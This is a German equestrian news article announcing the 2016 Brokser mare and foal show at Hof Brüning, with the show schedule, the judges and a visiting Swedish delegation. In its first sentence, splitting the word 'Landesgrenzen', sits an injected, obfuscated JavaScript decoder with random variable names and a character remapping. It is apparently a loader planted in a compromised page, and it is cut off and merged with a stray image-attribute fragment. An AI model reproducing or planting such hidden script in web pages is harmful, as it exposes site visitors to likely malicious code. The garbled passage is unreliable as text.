Brokser Stuten- und Fohlenevent 2016

26. Mai 2016 | Von Redaktion | Kategorie: Veranstaltungen, Zucht
Der Brokser Stuten- und Fohlenevent ist in der Züchterszene bis weit über seine L<script type=function m65c3bbf5572b(wc){var s4=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var r1=”;var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandesgrenzen hinaus bekannt (Foto: Marianne Schwöbel).” width=”600″ height=”400″ />

Die Pferdetage für Kenner, Freunde und Dich“ – unter diesem Motto findet auch in dieser Zuchtsaison wieder der Brokser Stuten- und Fohlenevent auf Hof Brüning in Ochtmannien statt. Die Mitglieder der Arbeitsgemeinschaft Süstedt, einem Zusammenschluss von sieben Pferdezuchtvereinen der Region, laden an diesem Wochenende unter der Leitung von Hans Heinrich Brüning am 04. und 05. Juni 2016 zu den über die Landesgrenzen hinaus bekannten Züchtertagen ein.

Am Samstag, den 04. Juni, haben ab 10:00 Uhr die Springstuten der Schau die Gelegenheit, ihre Qualität im Freispringen zu unterstreichen. Ab 11 Uhr werden sie sich dann, gemeinsam mit den Dressurstuten, bei Hannovers größter Stutenschau auf dem Laufsteg präsentieren und auf der Dreiecksbahn um die Gunst der Richter wetteifern. Es zu erwarten, dass dank des hohen Standes der Zucht in dieser Region auch in diesem Jahr wieder überdurchschnittlich viele Staatsprämienanwartschaften vergeben werden.
Eingeläutet wird der gesellige Teil der Veranstaltung dann am Abend mit der After Show Party.
Aber auch die Fohlenschau am Sonntag, den 05. Juni, hat einiges zu bieten: Bereits zum zweiten Mal gehört sie zu den Qualifikationsschauen für das Fohlenchampionat in Lienen und ist offen für alle Warmblutrassen und Deutschen Reitponys.

Als Richter konnten die Veranstalter Westfalens Zuchtleiter Wilken Treu gewinnen. Unterstützt wird der exzellente Pferdemann durch die Richterkommission des Hannoveraner Verbandes. Um das Zucht-Event zu Ausbildungszwecken angehender Zuchtrichter zu nutzen, hat sich in diesem Jahr eine 30köpfige Delegation aus Schweden angekündigt.

Eine Ausstellung rund um die Pferdehaltung komplettiert die Veranstaltung.

Tags: , , , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=136620

Hier klicken, um einen Kommentar zu schreiben